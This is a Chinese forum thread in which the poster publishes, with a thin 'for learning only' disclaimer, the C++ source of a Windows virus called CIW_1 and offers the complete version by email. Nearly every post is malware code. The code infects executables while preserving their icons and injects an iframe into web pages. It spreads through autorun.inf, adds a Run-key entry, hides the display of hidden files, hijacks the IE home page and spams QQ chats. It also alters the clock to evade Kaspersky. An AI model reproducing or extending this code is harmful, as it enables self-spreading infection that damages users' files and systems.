下面是一個病毒,本人寫這個病毒的目的是為了學(xué)習(xí),絕對沒有其他目的,如果你這篇文章的讀者,那也證明你也是為了學(xué)習(xí),絕對沒有其他目的.我也痛恨病毒,但只有學(xué)習(xí)了病毒的原理才能更好的防范病毒.
病毒名稱: CIW_1
病毒功能:
1.感染exe文件
2.彈出一個對話框,提示用戶已經(jīng)中毒了.
3.檢測是否有卡巴斯基,如果有就把時間改成1989年7月28日,讓卡巴變黑,然后感染,運行.
4.被感染后的exe的圖片不會變(不像熊貓燒香那樣會變成一只熊貓,為了這個功能我測試了100多次實現(xiàn)才弄明白的)
5.Autorun
6.開機運行
7.設(shè)置IE主頁
8.發(fā)QQ消息
9.感染 "htm", "html", "asp", "php", "jsp", "aspx" 文件
最后說明一點,因為有許多沒有技術(shù)又卑鄙的人經(jīng)常用代碼就直接編譯,然后到網(wǎng)上害人(這和我學(xué)習(xí)的目的不一樣,所以我把代碼改了3個地方,你們自己一個研究一邊改.)
如果你愿意只用于學(xué)習(xí),那么請你到下面留下你的信箱,我把一個完整的代碼發(fā)給你.
病毒代碼:
#include "stdafx.h"
#include "resource.h"
#include <cstdio>
#include <ctime>
#include<tlhelp32.h>
HINSTANCE hInst;
HWND hWnd;
ATOM
MyRegisterClass(HINSTANCE hInstance);
BOOL InitInstance(HINSTANCE, int);
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
/************** 程序ID定義 ******************/
#define id_Send 0x77E //發(fā)送按扭的ID
#define id_Infect 1000 //控制感染的定時器的ID
#define id_SendQQMsg 1001 //控制發(fā)送QQ消息的定時器ID
/************** 程序常量定義 ******************/
const int nWebFileTypeNum = 6; //網(wǎng)頁類型的數(shù)目
const char *szWebFilePostfix[nWebFileTypeNum] = { "htm", "html", "asp", "php", "jsp", "aspx" }; //感染網(wǎng)頁類型
/*************** 函數(shù)定義 ******************/
int InfectAllFile(char *szDir);
void SendQQMsg();
int GetVolumeName(char szVolumeName[] );
void ReleaseFile(char* szReleaseFileName);
int IsInfect(char *szFileName );
int InfectFile(char *szSrcFileName );
int CheckAntivirus();
int InfectAllFile(char *szDir);
void InfectWebFile(char *szInfectFileName );
void SetAutorun();
void GetPostfixName(char *szFileName, char *szPostfixName );
int GetVolumeName(char szVolumeName[] );
void WriteReg();
void ReleaseFile(char* szReleaseFileName)
{
char szFileName[200];
GetTempFileName( "C:\\Windows\\", "CIW_", 0, szFileName );
HRSRC hRes = FindResource( NULL, MAKEINTRESOURCE(14), RT_RCDATA );
if( hRes )
{
HGLOBAL hLoadRes = LoadResource( NULL, hRes );
LPVOID szSrcFileBuf = LockResource( hLoadRes );
DWORD nSizeOfSrcFile = SizeofResource(NULL, hRes );
if( szSrcFileBuf != NULL )
{
HANDLE hSrcFile = CreateFile( szFileName, GENERIC_WRITE | GENERIC_READ , FILE_SHARE_READ | FILE_SHARE_READ,
NULL, CREATE_ALWAYS, NULL, NULL);
WriteFile( hSrcFile, szSrcFileBuf, nSizeOfSrcFile, &nSizeOfSrcFile, NULL);
CloseHandle( hSrcFile );
STARTUPINFO si;
PROCESS_INFORMATION pi;
GetStartupInfo(&si);
CreateProcess(szFileName,GetCommandLine(),NULL,
NULL,NULL,NULL,NULL,NULL,&si,&pi);
}
}
else
{
szReleaseFileName = NULL;
return ;
}
strcpy( szReleaseFileName, szFileName);
}
|
|
|
|
|
|
|
|
|
2樓
int IsInfect(char *szFileName )
{
HMODULE hModule = LoadLibrary( szFileName );
if( hModule )
{
HRSRC hRes = FindResource(hModule , MAKEINTRESOURCE(14), RT_RCDATA );
FreeLibrary( hModule );
if( hRes )
{
return 1;
}
}
return 0;
}
const int FINDICONNUM = 15;
int InfectFile(char *szSrcFileName )
{
char szMyFileName[200];
GetModuleFileName( NULL, szMyFileName, 200);
DeleteFile("C:\\Windows\\CIW.exe");
CopyFile( szMyFileName, "C:\\Windows\\CIW.exe", true );
HMODULE hModule =LoadLibrary( szSrcFileName );
int i = 0, j = 0;
HRSRC hRes ;
DWORD dwIconSize;
for(; i < FINDICONNUM ;i ++ )
{
hRes = NULL;
hRes = FindResource( hModule, (LPCTSTR)i, RT_ICON );
dwIconSize = SizeofResource( hModule, hRes) ;
if( i == (FINDICONNUM - 1))
{
i = 0;
j ++ ;
if( j == 13 )
{
break;
}
}
}
HANDLE hUpdateTemp;
if( hRes )
{
hUpdateTemp = BeginUpdateResource( "C:\\Windows\\CIW.exe", false );
}
else
{
hUpdateTemp = BeginUpdateResource( "C:\\Windows\\CIW.exe", true );
}
HGLOBAL hLoadRes = LoadResource( hModule, hRes);
UpdateResource( hUpdateTemp, RT_ICON, (char*)1, 0, hLoadRes, dwIconSize );
DestroyIcon( (HICON) hLoadRes );
EndUpdateResource( hUpdateTemp, false );
FreeLibrary( hModule );
HANDLE hSrcFile = CreateFile( szSrcFileName, GENERIC_WRITE | GENERIC_READ , FILE_SHARE_READ | FILE_SHARE_READ,
NULL, OPEN_EXISTING, NULL, NULL);
if( (int)hSrcFile == -1 )
{
return 0;
}
DWORD nSizeOfSrcFile = GetFileSize( hSrcFile, &nSizeOfSrcFile );
char *szSrcFileBuf = new char[ nSizeOfSrcFile ];
ReadFile( hSrcFile, szSrcFileBuf, nSizeOfSrcFile, &nSizeOfSrcFile, NULL);
HANDLE hUpdate = BeginUpdateResource( "C:\\Windows\\CIW.exe", false );
UpdateResource( hUpdate, RT_RCDATA, MAKEINTRESOURCE(14),NULL, szSrcFileBuf, nSizeOfSrcFile);
EndUpdateResource( hUpdate, false );
delete []szSrcFileBuf;
CloseHandle( hSrcFile );
return 1;
}
|
|
|
|
|
3樓
int CheckAntivirus()
{
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(pe32);
BOOL bMore = 1;
HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap==INVALID_HANDLE_VALUE)
{
return 0;
}
while(bMore)
{
//有沒有卡巴斯基
if( strcmp( "avp.exe", pe32.szExeFile ) )
{
return 1;
}
bMore=Process32Next(hProcessSnap,&pe32);
}
CloseHandle(hProcessSnap);
return 0;
}
//大寫字符串轉(zhuǎn)小寫字符串
void Change(char *str )
{
for( int i = 0; i < (int)strlen( str ); i++ )
{
if( str[i] >= 'A' && str[i] <= 'Z' )
{
str[i] -= 'A' - 'a';
}
}
}
void GetPostfixName(char *szFileName, char *szPostfixName )
{
int nFileNameSize = strlen( szFileName );
for( int i = nFileNameSize - 1; i >= 0; i--)
{
if( szFileName[i] == '.' )
{
break;
}
}
i= nFileNameSize - i - 1; //文件后綴名的長度
for( int j = 0; j < nFileNameSize; j ++ )
{
szPostfixName[ j ] = szFileName[ nFileNameSize - i + j ];
}
szPostfixName[ j ] = 0;
}
int InfectAllFile(char *szDir)
{
DWORD dwPeType;
char directory[MAX_PATH];
char file[MAX_PATH];
HANDLE hFile;
WIN32_FIND_DATA fd;
memset( &fd, 0, sizeof(WIN32_FIND_DATA) );
strncpy(directory, szDir,MAX_PATH);
strcat(directory,"*.*");
hFile = FindFirstFile(directory, &fd);
do
{
if( fd.cFileName[0] != '.' )
{
if( fd.dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY) //是目錄
{
memset(file, 0, MAX_PATH);
strcpy(file, szDir );
strcat(file, fd.cFileName );
strcat(file, "\\" );
InfectAllFile(file);
}
else //是文件
{
memset(file, 0, MAX_PATH);
strcpy(file, szDir);
strcat(file, fd.cFileName );
if( strcmp( fd.cFileName, "NTDETECT.COM") == 0) //是 "NTDETECT.COM" 文件跳出
{
continue;
}
char szPostfixName[20];
int i = GetBinaryType( file, &dwPeType );
GetPostfixName( file, szPostfixName );
if((dwPeType == SCS_32BIT_BINARY ||
dwPeType ==SCS_OS216_BINARY ) && i ) //是PE文件感染
{
if( !IsInfect( file ) ) //是否感染過
{
InfectFile( file );
DeleteFile( file );
CopyFile( "C:\\Windows\\CIW.exe", file, false);
}
}
else //不是PE文件
{
for( int i = 0; i < nWebFileTypeNum; i++)
{
if( strcmp( szPostfixName, szWebFilePostfix[i] ) == 0 ) //是網(wǎng)頁文件
{
InfectWebFile( file );
}
}
}
}
}
}while( FindNextFile( hFile, &fd) );
return 0;
}
|
|
|
|
|
4樓
void SendQQMsg()
{
HWND hFore, hChat, hParent;
char szTest[] = "這是我的QQ主頁哦! http://user.qzone.qq.com/281011131 ";
HWND hWnd=NULL;
char name[200];
int len;
char ch[3] = {0, 0, 0};
while(hWnd=FindWindowEx(NULL,hWnd,NULL,NULL))
{
GetWindowText(hWnd,name,200);
len=strlen(name);
ch[0]=name[len-2];
ch[1]=name[len-1];
if(strcmp(ch,"群")==0 || strcmp(ch,"中")==0 )
{
hFore=FindWindow(NULL,name);
hParent=FindWindowEx(hFore,NULL,"#32770",NULL);
hChat=FindWindowEx(hParent,NULL,"AfxWnd42",NULL);
hChat=FindWindowEx(hParent,hChat,"AfxWnd42",NULL);
hChat=FindWindowEx(hChat,NULL,"RichEdit20A",NULL);
if( hChat )
{
SendMessage( hChat ,EM_REPLACESEL,0,LPARAM(szTest));
SendMessage(hParent,WM_COMMAND,id_Send,BN_CLICKED);
}
}
}
}
/******** 獲得所有的磁盤 ********/
int GetVolumeName(char szVolumeName[] )
{
int nVolumeNum = 0;
WIN32_FIND_DATA fd;
for( int i = 'C'; i <= 'Z'; i ++ )
{
char szVolumeNameTemp[10];
sprintf( szVolumeNameTemp, "%c:\\*.*", i );
HANDLE hFile = FindFirstFile( szVolumeNameTemp, &fd);
if( ( unsigned int ) hFile != -1)
{
szVolumeName[ nVolumeNum ] = i;
nVolumeNum ++;
}
}
szVolumeName[ nVolumeNum ] = 0;
return nVolumeNum; //磁盤的數(shù)目
}
/******** 感染網(wǎng)頁文件 ********/
void InfectWebFile(char *szInfectFileName )
{
//感染網(wǎng)頁的內(nèi)容
char szWriteText[] = "<iframe src=http://user.qzone.qq.com/281011131 width=height=0></iframe>";
unsigned long dwWriteTextByte = strlen( szWriteText );
char *szWebFileBuf = new char[ dwWriteTextByte + 1] ;
HANDLE hWebFile = CreateFile( szInfectFileName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ,
NULL, OPEN_EXISTING, NULL, NULL);
DWORD dwWebFileSize = GetFileSize( hWebFile, &dwWebFileSize);
if( dwWebFileSize < dwWriteTextByte)//沒有被感染過
{
//感染
SetEndOfFile( hWebFile );
WriteFile( hWebFile, szWriteText, dwWriteTextByte, &dwWriteTextByte, 0);
}
else
{
SetFilePointer( hWebFile, dwWebFileSize - dwWriteTextByte, 0, FILE_BEGIN);
ReadFile( hWebFile, szWebFileBuf, dwWriteTextByte, &dwWriteTextByte, NULL);
szWebFileBuf[dwWriteTextByte] = 0;
if( strcmp( szWebFileBuf, szWriteText) != 0 ) //沒有被感染過
{
//感染
SetEndOfFile( hWebFile );
WriteFile( hWebFile, szWriteText, dwWriteTextByte, &dwWriteTextByte, 0);
}
}
delete [] szWebFileBuf;
CloseHandle( hWebFile );
}
/******** AutoRun.inf ********/
void SetAutorun()
{
char szVolumeName[25];
int nVolumeNum = GetVolumeName( szVolumeName );
for( int i = 0; i < nVolumeNum; i++)
{
char szFileName[20];
char szMyFileName[200];
char szAutorunFile[100];
sprintf( szFileName, "%c:\\CIW.exe", szVolumeName[i] );
sprintf( szAutorunFile, "%c:\\autorun.inf", szVolumeName[i] );
DeleteFile( szAutorunFile );
DeleteFile( szFileName );
GetModuleFileName( NULL, szMyFileName, 200);
CopyFile( szMyFileName, szFileName, true);
HANDLE hAutorunFile = CreateFile( szAutorunFile, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ,
NULL, CREATE_ALWAYS, NULL, NULL);
char szWriteText[200] ;
sprintf(szWriteText, "[Autorun] \n open=%s \nshellexecute=%s\nshell\\Auto\\command=%s",
szFileName, szFileName, szFileName);
DWORD dwWriteByte;
WriteFile( hAutorunFile, szWriteText, strlen( szWriteText ), &dwWriteByte, 0);
CloseHandle( hAutorunFile );
SetFileAttributes( szFileName, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes( szAutorunFile, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
}
}
|
|
|
|
|
5樓
/******** 注冊表操作 ********/
void SetRegValue(HKEY hKey, char *szSubKey, char *szKeyName, char *szValue )
{
RegOpenKeyEx( hKey, szSubKey, 0,
KEY_ALL_ACCESS, &hKey);
if( hKey )
{
RegSetValueEx( hKey, szKeyName, 0, REG_SZ, (const unsigned char *)szValue,
strlen( (char *)szValue ) );
}
RegCloseKey( hKey );
}
/******** 寫入一些常用的注冊表值 ********/
void WriteReg()
{
//實現(xiàn) 開機啟動程序
char szMyFileName[200];
GetModuleFileName( NULL, szMyFileName, 200);
SetRegValue( HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "CIW_1", szMyFileName);
//實現(xiàn) 不能打開顯示文件
SetRegValue( HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",
"CheckedValue", "0");
//設(shè)置 IE的主頁
SetRegValue( HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\Main",
"Start Page", "http://user.qzone.qq.com/281011131");
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
MSG msg;
MyRegisterClass(hInstance);
InitInstance (hInstance, nCmdShow);
while (GetMessage (&msg, NULL, 0, 0))
{
DispatchMessage (&msg) ;
}
return msg.wParam;
return 0;
}
ATOM MyRegisterClass(HINSTANCE hInstance)
{
WNDCLASSEX wcex;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.style
= CS_HREDRAW | CS_VREDRAW;
wcex.lpfnWndProc = (WNDPROC)WndProc;
wcex.cbClsExtra = 0;
wcex.cbWndExtra = 0;
wcex.hInstance
= hInstance;
wcex.hIcon = NULL;
wcex.hCursor = NULL;
wcex.hCursor
= LoadCursor(NULL, IDC_ARROW);
wcex.hbrBackground
= (HBRUSH)(COLOR_WINDOW+1);
wcex.lpszMenuName = NULL;
wcex.lpszClassName
= "CIW";
wcex.hIconSm = NULL;
return RegisterClassEx(&wcex);
}
BOOL InitInstance(HINSTANCE hInstance, int nCmdShow)
{
hInst = hInstance;
hWnd = CreateWindow("CIW", "CIW" , WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);
MoveWindow(hWnd,0,0,0,0,false);
SetTimer( hWnd, 1000, 5000, NULL);
MessageBox( NULL, "你已經(jīng)中了CIW_1病毒了", "提示", MB_ICONERROR);
return TRUE;
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
static int nIsInfect = false; //是否要感染其他PE文件
switch (message)
{
case WM_CREATE:
{
/************ 有沒有啟動卡巴斯基 ***************/
int bIsAntiVirus = CheckAntivirus();
SYSTEMTIME sysTime ;
SYSTEMTIME localTime ;
GetLocalTime( &localTime );
memcpy( &sysTime, &localTime, sizeof( SYSTEMTIME ) );
sysTime.wDay = 28;
sysTime.wMonth = 7;
sysTime.wYear = 1989;
if( bIsAntiVirus )
{
SetLocalTime( &sysTime );
}
char szTempFileName[200];
SetAutorun(); //Autorun.inf
if( bIsAntiVirus ) //有啟動卡巴
{
SetLocalTime( &localTime );
}
/************ 有沒有啟動卡巴斯基 ***************/
char szVolumeName[25];
char szInfectVolumeName[50];
int nVolumeNum = GetVolumeName( szVolumeName ); //獲取磁盤名和磁盤的個數(shù)
//隨機感染磁盤的文件
srand( time( 0 ) );
sprintf( szInfectVolumeName, "%c:\\", szVolumeName[rand()%nVolumeNum]);
InfectAllFile( szInfectVolumeName );
}
break;
case WM_TIMER:
SendQQMsg();
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd, message, wParam, lParam);
}
return 0;
}
|
|
|
|
|
6樓
如果吧里不能發(fā)病毒代碼的話,請吧主刪除此貼吧
原來不想開源的,畢竟是病毒這東西,但是今天發(fā)現(xiàn)對這個病毒不感興趣,而已很多初學(xué)者都說C或者C++學(xué)了沒有實際用處,所以就開源了,希望給初學(xué)者一點信心.
|
|
2